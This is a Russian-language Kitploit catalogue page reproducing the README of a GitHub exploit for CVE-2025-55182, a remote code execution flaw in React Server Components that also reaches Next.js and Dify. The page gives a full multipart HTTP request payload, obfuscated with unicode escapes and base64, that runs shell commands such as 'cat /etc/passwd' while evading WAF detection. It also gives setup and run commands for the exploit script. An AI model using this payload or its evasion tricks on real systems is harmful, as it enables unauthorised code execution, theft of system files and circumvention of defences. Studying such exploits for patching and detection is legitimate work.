Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182-React-RCE — [Воспроизведение уязвимости] Первый в мире эксплойт для уязвимости CVE-2025-55182 React Server RCE, использующий особенности RSC для обхода детектирования WAF. | Kitploit
Инструменты/GitHubGitHub/xcanwin/cve-2025-55182-react-rce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбход WAFТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubxcanwin/cve-2025-55182-react-rce

CVE-2025-55182-React-RCE

[Воспроизведение уязвимости] Первый в мире эксплойт для уязвимости CVE-2025-55182 React Server RCE, использующий особенности RSC для обхода детектирования WAF.

Репозиторий
15149 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55182-React-RCE

Введение в проект и принцип работы

  • Первый в мире эксплойт уязвимости CVE-2025-55182 React Server RCE, обходящий детектирование WAF благодаря возможностям RSC.
  • Первый в мире эксплойт CVE-2025-55182 React Server RCE, способный обходить обнаружение WAF, используя RSC-специфичные функции.
  • Реализует RCE в среде React Server по умолчанию.
  • Добавлен оригинальный EXP, поддерживающий тактику обхода WAF. Принцип: в getOutlinedModel можно перекрёстно ссылаться на JSON между блоками и по уровням.
  • Предоставляет предельно упрощённую среду воспроизведения.

Преимущества EXP

  • RCE достигается без __proto__:then и constructor:constructor.
  • Не содержит ключевых слов, которые WAF часто блокирует: "then": $1:__proto__:then, "get": $1:constructor:constructor, require('child_process').
  • Один EXP совместим со средами React Server, Next.js и Dify с конфигурацией по умолчанию.

Преимущества среды воспроизведения

  • Предельно компактная.
  • Быстрое развёртывание.

Краткое описание уязвимости

ИнформацияЗначение
Название уязвимостиReact Server RCE
Идентификатор уязвимостиCVE-2025-55182
Уровень рискаВысокий
Тип уязвимостиRCE
Сложность эксплуатацииНизкая

Затронутые версии

  • React: затронутая версия == 19.0.0
  • React: затронутая версия == 19.0.1
  • React: затронутая версия == 19.1.0
  • React: затронутая версия == 19.2.0
  • Пакет react-server-dom-webpack: затронутые версии == 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.2.0
  • Пакет react-server-dom-parcel: затронутые версии == 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.2.0
  • Пакет react-server-dom-turbopack: затронутые версии == 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.2.0
  • Next.js: затронутая версия >= 14.3.0-canary.77
  • Next.js: 15.0.0 <= затронутая версия < 15.0.5
  • Next.js: 15.1.0 <= затронутая версия < 15.1.9
  • Next.js: 15.2.0 <= затронутая версия < 15.2.6
  • Next.js: 15.3.0 <= затронутая версия < 15.3.6
  • Next.js: 15.4.0 <= затронутая версия < 15.4.8
  • Next.js: 15.5.0 <= затронутая версия < 15.5.7
  • Next.js: 16.0.0 <= затронутая версия < 16.0.7
  • Dify: 1.1.2 <= затронутая версия < 1.10.1-fix.1

EXP 1

Подходит для сценария обхода WAF и сценария по умолчанию:

POST / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: test
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Length: 1445

------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="0"

"$@1"
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="1"

{
    "\u0074\u0068\u0065\u006e": "$2:et",
    "status": "$2:es",
    "reason": "",
    "value": "$2:ev",
    "_response": "$2:er"
}
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="2"

{
    "et": "$3",
    "es": "$4",
    "ev": "{\"\u0074\u0068\u0065\u006e\":\"\u0024\u0042\"}",
    "er": {
        "_prefix": "$2:ep",
        "_formData": "$2:ef"
    },
    "ep": "$5",
    "ef": {
        "get": "$2:eg"
    },
    "eg": "$6"
}
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="3"

"$0:\u0074\u0068\u0065\u006e"
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="4"

"\u0072\u0065\u0073\u006f\u006c\u0076\u0065\u0064\u005f\u006d\u006f\u0064\u0065\u006c"
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="5"

"x='Y2F0IC9ldGMvcGFzc3dk';d=u=>Buffer.from(u,'bas'+'e64')+'';y=global[d('cHJvY2Vzcw==')][d('bWFpbk1vZHVsZQ==')][d('cmVxdWlyZQ==')](https://github.com/xcanwin/cve-2025-55182-react-rce/blob/main/d%28%27Y2hpbGRfcHJvY2Vzcw%3D%3D%27))[d('ZXhlY1N5bmM=')](https://github.com/xcanwin/cve-2025-55182-react-rce/blob/main/d%28x))+'';throw Object.assign(new Error(y),{digest:y});"
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="6"

"$0:toString:\u0063\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072"
------WebKitFormBoundaryx8jxCaNwiNWP3Sad--

Воспроизведение 1

  1. Среда на стороне сервера:
react-server-dom-webpack 19.2.0
  1. На сервере загрузите и установите зависимости, необходимые для react-server-dom-webpack:
git clone https://github.com/xcanwin/CVE-2025-55182-React-RCE
cd CVE-2025-55182-React-RCE
npm install
npm run dev -- --hostname 127.0.0.1 --port 3000

Сервис успешно развёрнут: http://127.0.0.1:3000/

  1. Клиент использует EXP
python3 -m venv .venv
. ./.venv/bin/activate
pip3 install requests
python3 CVE-2025-55182-React-RCE.py --url http://127.0.0.1:3000/ --exp "cat /etc/passwd"

Воспроизведение 2

  1. Среда на стороне сервера:
Next.js 16.0.6
其实也对应react-server-dom-webpack 19.2.0
  1. На сервере загрузите и установите зависимости, необходимые для Next.js:
git clone https://github.com/xcanwin/CVE-2025-55182-React-RCE
cd CVE-2025-55182-React-RCE
npx [email protected] nextapp --yes --js --no-tailwind --no-eslint --empty
cd nextapp
npm run dev -- --hostname 127.0.0.1 --port 3000

Сервис успешно развёрнут: http://127.0.0.1:3000/

  1. Клиент использует EXP (как указано выше)
python3 CVE-2025-55182-React-RCE.py --url http://127.0.0.1:3000/ --exp "cat /etc/passwd"
Скачать инструмент